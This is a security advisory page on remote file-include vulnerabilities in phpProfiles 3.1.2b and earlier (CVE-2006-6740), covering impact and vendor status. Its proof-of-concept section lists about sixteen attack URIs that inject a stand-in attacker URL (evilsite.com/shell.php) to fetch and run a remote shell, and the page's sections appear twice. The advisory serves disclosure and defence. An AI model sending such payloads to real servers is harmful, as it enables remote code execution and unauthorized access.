PHPProfiles Multiple Remote File Include Vulnerabilities
BID:21667
Info
PHPProfiles Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 21667 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-6740 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 19 2006 12:00AM |
| Updated: | Mar 02 2007 03:55PM |
| Credit: | nuffsaid is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
phpProfiles phpProfiles 3.1.2b phpProfiles phpProfiles 2.1 |
| Not Vulnerable: | |
Discussion
PHPProfiles Multiple Remote File Include Vulnerabilities
phpProfiles is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
phpProfiles 3.1.2b and prior versions are vulnerable to these issues.
phpProfiles is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
phpProfiles 3.1.2b and prior versions are vulnerable to these issues.
Exploit / POC
PHPProfiles Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php http://www.example.com/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php http://www.example.com/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php http://www.example.com/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php http://www.example.com/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?
Solution / Fix
PHPProfiles Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
The vendor reports this issue will be addressed in an upcoming release of the software.
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
The vendor reports this issue will be addressed in an upcoming release of the software.
References
PHPProfiles Multiple Remote File Include Vulnerabilities
References:
References:
- Linux Web Shop Forum Index -> Announcements- phpProfiles [read only] (phpProfiles)
- phpProfiles Homepage (phpProfiles)